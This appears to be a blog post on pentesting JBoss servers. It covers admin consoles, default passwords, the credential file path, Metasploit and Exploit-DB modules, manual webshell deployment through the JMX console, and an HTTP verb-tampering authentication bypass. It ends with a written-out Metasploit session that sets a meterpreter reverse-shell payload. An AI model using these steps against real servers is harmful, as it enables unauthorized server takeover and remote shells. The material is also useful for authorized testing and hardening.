Jboss Pentesting & HTTP Verbal Tampering

It is about 2-3 months I pentest Jboss & Tomcat…There are some issue I think can be useful to exploit Jboss. First of all, as any application server, you can totally own the server by getting into the application server admin console. You’ll have 2 way to do this:

  • weak password
  • exploiting

Jboss has 2 kind of admin console: the first one, the oldest one, is the jmx-console, ie http://localhost:8080/jmx-console/

and the second one, from Jboss 5.5 or similar http://localhost:8080/admin-console/

Jboss has quite always an Information Leakage page, very useful to debug your tries http://localhost:8080/status?full=true

Then you can find another console http://localhost:8080/web-console/ This is only an informational-one, because it uses the JMX Console to deploy and doing things… so there is no “straight-way” to use it, even if there are some interesting aspects to analyze

Weak Passwords

Jboss 4 has no password for jmx-console; on Jboss>4 , there are some default password, usually admin/admin

If you can read files, point to

server\default\deploy\jmx-console.war\WEB-INF\classes\jmx-console-users.properties

and you’ll have an easy own.

Deploying a Webshell

To deploy something, you’ll have 3 choiches

  1. metasploit, with 3 sub-choiches
    1. http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
    2. http://www.metasploit.com/modules/exploit/multi/http/jboss_bshdeployer
    3. http://www.metasploit.com/modules/exploit/multi/http/jboss_deploymentfilerepository
  2. the daytona pack, that is a self-running version of those metasploit-exploits http://www.exploit-db.com/exploits/17977/
  3. the manual way

With metasploit, it is better to deploy a meterpreter, as usual. The daytona pack will provide you with a reverse shell.

Manually, you can check many thins as explained here: http://lab.mediaservice.net/notes_more.php?id=JBOSS_more

To upload a webshell manually, the best way is

  • get a domain/webspace on a web server and upload your webshell (for example wsh4jboss.war, but mine is an old-fashioned-style webshell
  • go to http://localhost:8080/jmx-console/ ->look forDeploymentScanner -> look for addURL() -> put your http://mydomain/wsh4jboss.war here, then Invoke
  • NOTE: it is a quick way to do this, but it will continuously load the war from mydomain, so you can run out of bandwidth
  • to undeploy, http://localhost:8080/jmx-console/ ->jboss.web.deployment -> find your shell -> click -> stop() and/or destroy()

Why the “manual” way? Because if daytona/metasploit fails, it is not always unexploitable :)

HTTP Verbal Tampering

You can do everything with a JMX-Console password (or if your jmx-console does not has a password); but if you can’t get it?

So, do you know what HTTP Verbal Tampering is? (I think this is the Fortify name). Every web application J2EE has a WEB-INF\web.xml file; it says many things (audit it when you pentest/code review!!), but we need to the security-constraint section:

<security-constraint> 
 <web-resource-collection> <web-resource-name>HtmlAdaptor</web-resource-name>
     <description>An example security config that only allows users with 
 the role JBossAdmin to access the HTML JMX console web application </description>
  <url-pattern>/*</url-pattern>
 <http-method>GET</http-method>
 <http-method>POST</http-method>
 </web-resource-collection> 
 <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
</security-constraint>

So, let’s understand this XML Piece; what does it says? If you read documentation, you’ll discover that what the comment says is false. This piece of XML says “To access  HtmlAdaptor/* by GET or POST, you have to be member of the JBossAdmin group“. What does not says is “To access  HtmlAdaptor/* by HEAD, PUT, DELETE, MODIFY, OPTIONS and TRACE, you does not need to be in any group

What can you do with HEAD/PUT/….? In Java every servlet (HTMLAdaptor is the main JMX-Console servlet) needs to implement doGet(…) doPost(…) doPut(…) method to serve for a specific HTTP Verb; a JSP, instead, can answer to any Verb, so a JSP is less secure than a servlet. So it is very unlikely you will modify any file or put a file on the AS…

But HEAD is like GET, except for the fact you’ll not see the outpu –> some requests to the jmx-console can be done with HEAD –> this is the “Jboss exploitation tecnique”

With metasploit, any of the previous mode support the modification of the Verbal HTTP:

msf > use exploit/multi/http/jboss_maindeployer
msf exploit(jboss_maindeployer) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(jboss_maindeployer) > set LHOST [MY IP ADDRESS]
msf exploit(jboss_maindeployer) > set RHOST [TARGET IP]
msf exploit(jboss_maindeployer) > set VERB HEAD
msf exploit(jboss_maindeployer) > exploit

Remember to check the /status?full=true page ;)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s